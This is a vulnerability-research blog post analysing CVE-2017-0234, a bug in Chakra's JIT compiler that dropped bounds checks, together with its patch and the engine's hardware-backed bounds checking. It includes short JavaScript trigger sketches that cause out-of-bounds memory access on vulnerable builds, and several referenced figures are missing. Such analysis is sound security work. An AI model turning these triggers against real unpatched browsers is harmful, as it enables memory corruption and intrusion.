Check it Out: Enforcement of Bounds Checks in Native JIT Code
October 05, 2017 | Simon Zuckerbraun

In my previous post, I described how the history of JavaScript has led to the mushrooming complexity – and corresponding attack surface – of modern JavaScript engines. Judging from submissions to the Zero Day Initiative (ZDI), the JavaScript engine is the principal epicenter of browser vulnerabilities today, both in quantity and in quality. In this post, I will present details of a prime example of a vulnerability within the execution engine of Chakra, the JavaScript engine present in Microsoft Edge. This will be a deep dive, so grab a beverage!
At the 2017 Pwn2Own competition, among the victorious contestants was Tencent Security – Team Ether. On Day 1 of the competition, they delighted everyone with a remote code execution and sandbox escape exploit chain on Microsoft Edge. They gained remote code execution through a bug in Chakra, CVE-2017-0234. The proof-of-concept trigger for this bug is a tiny and innocent-looking snippet of JavaScript:
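A hypothetical sketch of the shape of such a trigger follows; the constants and the final, unexpected argument here are illustrative, not those of Team Ether's actual PoC:

```js
// Illustrative sketch only; the real PoC differs in its details.
function jitBlock(arr, idx) {
    arr[idx] = 0x41414141;  // profiled as a store into a Uint32Array
}

var buf = new Uint32Array(0x10000);  // large enough to use the "virtual" allocator

// Warm up: repeated calls drive up the profiling counters until Chakra
// decides to JIT-compile jitBlock for the observed argument types.
for (var i = 0; i < 0x10000; i++) {
    jitBlock(buf, i & 0xffff);
}

// One last call with an unexpected argument reaches JIT code that was
// emitted without a bounds check.
jitBlock(buf, 0x7fffffff);
```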
The for loop invokes jitBlock repeatedly, eventually prompting Chakra to invoke the JIT compiler to compile jitBlock into native code. Next, the PoC invokes jitBlock one last time, passing an unexpected argument. Running this on a vulnerable version of ChakraCore (75bec08e) produces an out-of-bounds write:
The out-of-bounds write occurs in the JIT-compiled code. A quick examination of the code reveals the problem:
Amazingly, the JIT compiler has produced code that is completely missing a bounds check! Why would that ever occur?
Some Background on JavaScript Execution
Before exploring the answer, some essential background information is in order. As I mentioned in the previous post, modern JIT engines cannot rely entirely on either interpreted or compiled execution. Interpreted execution is too slow for high-performance scenarios, and compiled execution is prohibitive in terms of up-front startup delay. Furthermore, it is infeasible to compile JavaScript directly into high-performing native code because of the extremely dynamic nature of the language.

To solve these problems, modern JavaScript engines employ multiple modes of execution. When new script is loaded, the engine begins executing it with an interpreter, enabling rapid startup. In addition to executing the script, the interpreter is also tasked with acquiring dynamic profiling information. This includes execution counts for functions and loops, as well as information such as the types found in individual variables. At some point, the engine may determine that it is advantageous to compile some or all of the script; it makes this decision based upon the profiling counters updated during interpretation. When this occurs, the compiler makes use of the dynamic profiling information collected during interpretation to guide the compilation process. This on-the-fly compilation is also known as “JIT” or just-in-time compilation.
As an example, suppose a line of JavaScript makes an assignment to arr[0], and the dynamic profiling information collected during interpretation indicates that the variable arr typically contains a Uint32Array. If the JIT compiler is invoked, it will produce native code optimized for the assumption that arr is a Uint32Array. The resulting native code will first do a type check to validate the assumption. If the assumption holds true, the native code can proceed with a highly-optimized store operation. If the assumption is found to be false, execution of the native JIT code must not proceed. Instead, the JIT code branches back into the engine, which resumes executing JavaScript using the interpreter at the point that the JIT code left off. This branch is known as a “bail out”. This description is tailored for Chakra; other JavaScript engines use roughly analogous techniques.
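To make the bail-out behavior concrete, here is a hypothetical script exhibiting the pattern; the iteration count is illustrative, as actual JIT thresholds vary by engine build:

```js
function store(arr) {
    arr[0] = 1;  // profiling records that arr is typically a Uint32Array
}

var ta = new Uint32Array(8);
for (var i = 0; i < 10000; i++) {
    store(ta);  // interpreter profiles; eventually Chakra JIT-compiles store
}

// The JIT code's type check fails for an ordinary Array, so execution
// "bails out" and the interpreter completes the store instead.
store([0, 0, 0]);
```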
Note that in the JIT code in Figure 3, two such “bail out” branches are seen. The first checks that arr is an object, and the second checks that arr is an instance of Js::TypedArray<unsigned int,0,1>. If either check fails, a branch is made to 00000202`5e550124. Disassembling at that address, we can see the native code that invokes the bail out mechanism:
Analyzing the Patch for CVE-2017-0234
When I began analyzing this vulnerability, Microsoft had already shipped a patch. Searching the ChakraCore repository for commit messages containing “CVE-2017-0234” immediately revealed the commit containing the patch. The patch (a1345ad4) consists of just one change in a single file, GlobOpt.cpp, method GlobOpt::OptArraySrc. The class GlobOpt is part of the JIT compiler, responsible for performing “global” optimizations. Here is the patch (orange shows removed code, yellow shows added code):
We can see immediately that the problem was that, prior to the patch, GlobOpt::OptArraySrc would decide prematurely that it was safe to omit the upper and lower bounds checks. The patch rectifies this by adding some additional conditions.
Let’s analyze the patched version of the code and see if we can understand why it is safe to remove bounds checks when all the specified conditions hold true.
Starting with condition 1 in the figure above: The variable baseValueType contains information about the type that is expected to appear in the script variable arr. The principal source of this information is the dynamic profiling that occurred earlier, during interpreted execution. The condition checks IsLikelyOptimizedVirtualTypedArray(). This will return true if the variable arr is considered at least likely to be a typed array, specifically one that is called a “virtual” typed array – we will see the significance of this a bit later.
Proceeding to condition 2: This condition determines whether any additional actions will be needed at runtime in the event that script attempts to access an index past the end of the array. If the operation is a write into an element (isProfilableStElem), no special processing is needed when an attempted out-of-bounds access occurs. This is because out-of-bounds writes to typed arrays fail silently as per the ECMAScript specification (IntegerIndexedElementSet). As for element get operations, the ECMAScript specification (IntegerIndexedElementGet) prescribes that an out-of-bounds operation should return undefined. In numerical operations, undefined is treated as a 0, but undefined is not interchangeable with 0 in other operations. Consequently, for an element get, if the only use of the result is as a numeric value, then out-of-bounds reads can be safely regarded as reads of 0, with no other special processing.
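These typed-array semantics are easy to observe directly from script:

```js
var ta = new Uint32Array(4);

ta[100] = 42;               // out-of-bounds write: fails silently (IntegerIndexedElementSet)
console.log(ta[100]);       // undefined: out-of-bounds read (IntegerIndexedElementGet)
console.log(ta[100] | 0);   // 0: in an int32 context, undefined coerces to 0
console.log(ta[100] === 0); // false: undefined is not interchangeable with 0 elsewhere
```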
Condition 3 checks whether we are in an asm.js function. For the purposes of this discussion, we will assume we are not executing asm.js.
In condition 4, the code looks for the array index and obtains a pointer to a corresponding Value object. This object contains information that has been determined about the possible values that might be taken on by the index.
Finally, in condition 5, the code interrogates the idxValue object to see what guarantees can be made about the largest and smallest possible values of the index. If it can be guaranteed that the index will never be low enough nor high enough to produce an out-of-bounds condition, the code proceeds to turn on the flags that enable elimination of bounds checks in the final JIT’ed code.
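Pulling the five conditions together, here is a hedged sketch of the overall decision, reusing the names from the discussion above; the parameterization is illustrative and not ChakraCore's actual code:

```js
function canEliminateBoundsChecks(opts) {
    var MAX_ASMJS_ARRAYBUFFER_LENGTH = Math.pow(2, 32); // size of the 4GB reservation
    return opts.isLikelyOptimizedVirtualTypedArray       // condition 1
        && (opts.isProfilableStElem ||
            opts.resultUsedOnlyAsNumber)                 // condition 2
        && !opts.isAsmJs                                 // condition 3
        && opts.idxBounds !== undefined                  // condition 4: bounds are known
        && opts.idxBounds.lower >= 0                     // condition 5: no underflow...
        && opts.idxBounds.upper * (1 << opts.indirScale) // ...and the scaled upper bound
             < MAX_ASMJS_ARRAYBUFFER_LENGTH;             // stays under 2^32
}

// For a Uint32Array (indirScale = 2) with an index provably in [0, 0x40000000):
canEliminateBoundsChecks({
    isLikelyOptimizedVirtualTypedArray: true,
    isProfilableStElem: true,
    isAsmJs: false,
    idxBounds: { lower: 0, upper: 0x3fffffff },
    indirScale: 2
}); // true -> bounds checks omitted
```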
Understanding the Upper Bound Check
What is quite curious is the last line of condition 5, where the upper bound is examined. One might expect it to ensure that the upper bound of the index is less than the array length. But that is not what it does at all! Instead, it only ensures that the upper bound of the index (when multiplied by the element size, as encoded in indirScale) is less than a fixed constant, MAX_ASMJS_ARRAYBUFFER_LENGTH, which is defined as 2^32. Clearly, checking that the index is within the MAX_ASMJS_ARRAYBUFFER_LENGTH limit is not enough to guarantee that the index is within the bounds of the typed array. We conclude that, even after the patch, it remains possible to cause the JIT compiler to eliminate necessary bounds checks. How is this patch effective, then?
To illustrate, consider the following script:
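The following is a hypothetical script with the property described below; the exact script of Figure 7 may differ:

```js
function jitBlock(arr, index) {
    index = index & 0x3fffffff;  // the compiler can prove 0 <= index < 0x40000000
    return arr[index];
}

var arr = new Uint32Array(0x10000);  // 0x10000 elements; large enough to be "virtual"

for (var i = 0; i < 0x10000; i++) {
    jitBlock(arr, 0);  // warm up until jitBlock is JIT-compiled
}

jitBlock(arr, 0x10000);  // index 0x10000 is one element past the end of the array
```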
When compiling the script in Figure 7, the compiler recognizes that when execution reaches the array access, the script variable index is guaranteed to be between 0 and 0x40000000 (exclusive of 0x40000000). This information will be reflected in idxConstantBounds in condition 5 above. Condition 5 will pass, and the compiler will omit bounds checks. Sure enough, the resulting JIT-compiled code will perform an out-of-bounds read when we attempt to access the invalid index 0x10000:
It appears that we have circumvented the patch, and the patch has failed. However, in this case, appearances are quite deceiving.
The key to the puzzle is found back in condition 1 in Figure 6. Condition 1 ensures that bounds check elimination will not be performed unless arr is considered likely to be a “virtual” typed array. What is a “virtual” typed array? Whenever an ArrayBuffer is created (which is a prerequisite for creating a TypedArray, regardless of whether the ArrayBuffer is explicit in script), allocation of the buffer proceeds according to this code:

In ArrayBuffer.cpp:

In ArrayBuffer.h:

If the requested buffer length meets the conditions for a “virtual” buffer, allocation is performed by the AllocWrapper function. This function operates very differently from a traditional allocator. It calls VirtualAlloc to reserve memory, but the amount of memory reserved is unrelated to the amount of memory requested. Instead, it always reserves 32 bits of address space (a 4GB region of virtual addresses). Then, with a second call to VirtualAlloc, it converts part of the reserved area into accessible, committed memory. This committed region is at the beginning of the reserved region, and its length is exactly the size of the requested buffer. This code path will never be invoked for requested lengths of less than 64KB. See IsValidVirtualBufferLength for complete details.
This surprising and seemingly wasteful behavior provides a great benefit: when accessing a virtual array, JIT code can add any 32-bit displacement to the buffer base address and access the resulting address safely, without performing any bounds check. If the resulting address is past the end of the buffer, it will fall within the reserved but non-committed region. Recognizing the invalid address, the processor’s MMU will generate an access violation fault. The Chakra engine will then catch the access violation, recognize that it came from JIT code, and resume execution with the next instruction (see JavascriptFunction::ResumeForOutOfBoundsArrayRefs). In the case of a read operation, it will set the destination register to 0 before resuming, in accordance with the ECMAScript specification (see the discussion of condition 2 above). Put another way, for virtual arrays, bounds checking is offloaded from software to the hardware MMU.
In the above example, after the AV occurs, if we run !address in the debugger to examine the address that could not be written, we see that it is not a free address. Instead, it is in the MEM_RESERVE state. This indicates that the AV is not an exploitable condition: a malicious actor would not be able to place any other allocation at that address.
We can now understand the logic of condition 5, which checks if it can be guaranteed that the index will not result in a displacement greater than or equal to 2^32. If this cannot be guaranteed, software bounds checks are needed. But if the compiler can make a guarantee based on static examination of the code that the displacement will always be less than 2^32 (as is the case for the script of Figure 7), software bounds checks can be omitted. Any out-of-bounds condition will be turned safely into an AV by the MMU.
I speculate that when the original pre-patch code was written, the author failed to notice that when the 32-bit index is scaled up by the element size, the resulting displacement may exceed the range of a 32-bit unsigned integer.
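A quick bit of arithmetic shows how the scaling overwhelms a 32-bit quantity:

```js
// Worked example: an index that fits comfortably in 32 bits can still yield
// a displacement past the 4GB (2^32-byte) reserved region once scaled.
var index = 0x80000000;                  // an unsigned 32-bit value
var elementSize = 4;                     // bytes per Uint32Array element
var displacement = index * elementSize;  // 0x200000000 = 8GB
console.log(displacement >= Math.pow(2, 32));  // true: beyond the reservation
```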
Ensuring an Array is Virtual: Array Type Checking
This is all very well when the buffer has been allocated using the “virtual” strategy. If the buffer has been allocated in the traditional way, however, it is unsafe to omit software bounds checks. As a result, condition 1 above warrants a closer look. The method used by condition 1 is IsLikelyOptimizedVirtualTypedArray. This condition will be met as long as the compiler judges it to be somewhat likely that arr is a virtually-allocated typed array – but it is by no means a guarantee. To guard against the eventuality that, at runtime, the array is not a virtual allocation, GlobOpt::OptArraySrc inserts a type check before the array access. We saw this type check in Figure 3. It consists of an instruction that compares the array object’s vtable with the vtable of the expected type, in this case, Js::TypedArray<unsigned int,0,1>. Note that the third template parameter, set to 1, indicates that the typed array is virtual. The code in GlobOpt::OptArraySrc that decides whether to insert the type check is as follows:
Recall that baseValueType carries whatever information is known about the type in the variable arr, including both definite and probabilistic knowledge. The code decides whether an array type check is necessary by invoking !baseValueType.IsObject(). On the surface, this is puzzling. A return value of true from the IsObject method indicates that it is known with certainty that arr contains a JavaScript object. Why is this sufficient to make it safe to omit the array type check?
The answer to this riddle lies in the details of the ValueType class, of which baseValueType is an instance. The ValueType class has members that encode various states of definite and probabilistic knowledge. However, it does not differentiate between the state “likely to be an Object with specific type X” and the state “definitely an Object, likely of specific type X.” Instead, ValueType contains only one “Likely” flag, which can be either true (indicating indefinite knowledge) or false (indicating definite knowledge). If baseValueType reports a specific array type, but the knowledge is only indefinite, the “Likely” flag will be true. Even if arr is provably an Object, IsObject will report false because of the presence of the Likely flag.
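A minimal sketch of this single-flag encoding follows; the field names here are hypothetical, as the real ValueType is a compact bit-field:

```js
// Hypothetical model of the single "Likely" flag described above.
function isObjectDefinite(valueType) {
    // Any "Likely" knowledge keeps the flag set, even for the state
    // "definitely an Object, likely of specific type X", so the check
    // is conservative: it returns true only for fully definite knowledge.
    return valueType.hasObjectType && !valueType.likely;
}

console.log(isObjectDefinite({ hasObjectType: true, likely: false })); // true
console.log(isObjectDefinite({ hasObjectType: true, likely: true }));  // false
```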
If IsObject returns true, we can be assured that the Likely flag is not set, and the reported array type is known with certainty. Then it is safe to omit the array type check. As far as I can tell, this works. However, in my opinion, it is somewhat poor form. At a future point, developers may change the implementation of ValueType, adding the ability to distinguish between the state “likely to be an Object with specific type X” and the state “definitely an Object, likely of specific type X”. In fact, in ValueType.cpp, there is a comment indicating that such a change has been considered (see method MergeWithObject). In that event, the call to IsObject would no longer be a sufficient indication that the array type is known with certainty. The above code would become vulnerable unless the maintainers are fortunate enough to become aware of the need to revisit and rethink these lines buried in GlobOpt::OptArraySrc. It would be considerably better to avoid such fragility.
Circumstances When Array Type Checking Can Be Omitted
As a follow-up, I was curious as to what circumstances could lead to baseValueType reporting that the type of the array is known definitely. After all, the types present in variables are inferred by observation during interpreted execution. Doesn’t it always remain a possibility that, during some subsequent execution of JIT code, the type in the variable will be different than it was during prior runs?
Investigating this question, I noticed the method ValueType::ToDefiniteObject, which basically produces a new instance of ValueType that is a clone of an original, except with the “Likely” flag turned off. Notably, this method is used by GlobOpt::OptArraySrc. The logic behind this is that once GlobOpt::OptArraySrc has inserted a check for a particular type of array, it is not necessary to perform the check again if the same array is accessed a second time. For example, consider the following JavaScript:
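A hypothetical two-line example of the kind discussed below, assuming arr already holds a typed array of the profiled type:

```js
// Assume, e.g.: var arr = new Uint32Array(0x10000);
arr[0] = 1;  // first line: OptArraySrc inserts a type check before this store
arr[1] = 2;  // second line: type now known definitely, so no second check
```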
For the first line, GlobOpt::OptArraySrc will insert a type check. Then it will modify the ValueType for the variable arr to indicate that its type is now known definitely. For the second line, GlobOpt::OptArraySrc will not insert a type check, because the type of arr is already definitely known. At runtime, execution will never reach the JIT code for the second line if arr is not of the expected type. Rather, in that circumstance, execution of the JIT code will have already ended with a bail out upon failure of the type check associated with the first line. This illustrates how GlobOpt::OptArraySrc does not always have to emit a type check for every array access.
A Harmful Security Effect of Hardware Bounds Checking
As we have discussed, Chakra boosts the performance of bounds checks on certain large arrays by offloading the checks from software to hardware. It achieves this by reserving sufficiently large regions of address space so that any out-of-bounds access will land in reserved but non-committed memory, producing an access violation. Accordingly, the Chakra engine recognizes that access violations originating from JIT code are expected occurrences and continues script execution in accordance with the ECMAScript specification.
Unfortunately, this has a somewhat negative effect on the security posture of the process as a whole. In traditionally-coded processes that do not use hardware bounds checking, any access violation that arises is a clear sign of corruption. In most applications, there is no reason to attempt to recover from an access violation. Instead, applications allow the process to terminate immediately. This default behavior is positive from a security standpoint. It creates a certain natural impediment for exploitation: An exploit can be successful only if it runs to completion without causing corruption that triggers an access violation. There is no second chance.
Access violations produced within JIT-compiled code, however, do not result in process termination. In fact, Chakra even allows JavaScript execution to proceed. This gives exploitation attempts an unusual amount of leeway. Even an unreliable exploitation technique, which in a traditional process would have little chance of succeeding before shutdown occurs, is given the opportunity to make an unlimited number of attempts against Chakra. It may even be possible for an exploit to abuse this specifically to probe for and discover valid memory addresses.
Microsoft has largely mitigated this deficiency in a recent commit to ChakraCore (a0cb397d). With this change, when deciding whether to handle an access violation, Chakra will verify that the faulting address is in fact within a MEM_RESERVE region. It will no longer handle access violations where the faulting address is in any other state. Accordingly, an access violation resulting from a failed exploitation attempt, which is typically an access to an entirely invalid (MEM_FREE) address, will once again produce safe program termination. Hopefully this mitigation will find its way into the Windows 10 Chakra binary without undue delay.
Summary
In this post, we’ve explored some of the complexities of the Chakra JIT compiler, specifically regarding enforcement of bounds checks in native JIT code. One notable feature we’ve uncovered is that the compiler will sometimes omit bounds checking instructions entirely, instead relying on large regions of reserved address space to provide a hardware-enforced safety net to catch attempted out-of-bounds accesses. Although the approach is fundamentally sound, there is much opportunity for subtle errors, as is demonstrated by CVE-2017-0234. In truth, we have only scratched the surface of the complex logic employed by the JIT compiler and the enormous variety of scenarios it must properly handle. We expect that Chakra and other JavaScript engines will continue to be a fertile area for vulnerability research.
You can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.